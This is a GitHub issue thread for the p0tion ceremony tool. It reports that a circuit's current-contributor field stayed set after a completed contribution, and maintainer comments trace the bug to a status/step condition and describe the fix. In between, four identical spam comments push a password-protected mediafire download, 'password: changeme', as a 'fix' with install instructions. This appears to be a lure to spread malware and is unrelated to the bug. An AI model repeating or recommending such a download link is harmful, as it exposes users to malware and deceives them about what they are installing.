### ISSUE TITLE
Circuit not cleared after completed contribution

### ISSUE THREAD

**Issue by glamperd** [privacy-scaling-explorations/p0tion#323]
# Prerequisites

Please answer the following questions for yourself before submitting an issue.

-   [x ] I am running the latest version
-   [x ] I checked the documentation and found no answer
-   [x ] I checked to make sure that this issue has not already been filed

# Expected Behavior

The circuit's `currentContributor` field should be cleared following a contribution., allowing the next waiting contributor (if any) to take their place.

# Current Behavior

This is intermittent and rare, but an instance has been identified in the MACI v2 ceremony of a circuit record left uncleared after the contributor had completed and moved through the remaining circuits. 

# Failure Information

Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.

## Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. step 1
2. step 2
3. you get it...

## Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

-   Firmware Version:
-   Operating System:
-   SDK version:
-   Toolchain version:

## Failure Logs

Circuit record (circuit #1) screen shot. This was taken ~12 hrs after the contribution. 
![image](https://github.com/user-attachments/assets/927e9633-8270-439a-b708-eaed7fb2185c)

Participant record: step = COMPLETED, status = DONE, showing that the participant had completed all 4 circuits in the ceremony. 
![image](https://github.com/user-attachments/assets/4345e76d-0b03-4aea-9058-dc8db9e9ae61)

![image](https://github.com/user-attachments/assets/cc592c03-b554-4bb9-9434-9d337c60d673)

Logs show no errors around completion of circuit #1
![image](https://github.com/user-attachments/assets/f55879f2-0787-4089-b24b-a7c6e36388eb)

No other contributor was waiting in the queue at the time, but the queue would effectively be frozen. The normal mechanism for clearing did not occur. The timeout function does not apply for this situation. 

In this case, the fields were manually cleared in order to keep the ceremony flowing.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by glamperd** [comment]
Log for coordinateParticipant function for 1st circuit:
![image](https://github.com/user-attachments/assets/b22a5ad8-baf3-47b4-b5b4-35d857aeb0c7)

Note: status remained CONTRIBUTING while step moved from VERIFYING to COMPLETED

The function code requires this set of conditions to be true:
```
const participantCompletedContribution =
            prevContributionProgress === changedContributionProgress &&
            prevStatus === ParticipantStatus.CONTRIBUTING &&
            prevContributionStep === ParticipantContributionStep.VERIFYING &&
            changedStatus === ParticipantStatus.CONTRIBUTED &&
            changedContributionStep === ParticipantContributionStep.COMPLETED
```
i.e. both status and step are expected to change at the same time.

In the absence of this, the `coordinate` function is not invoked.

**Comment by glamperd** [comment]
The above condition changed to work even if both status and step are not changed at once - as long as they are both at CONTRIBUTED/COMPLETED.
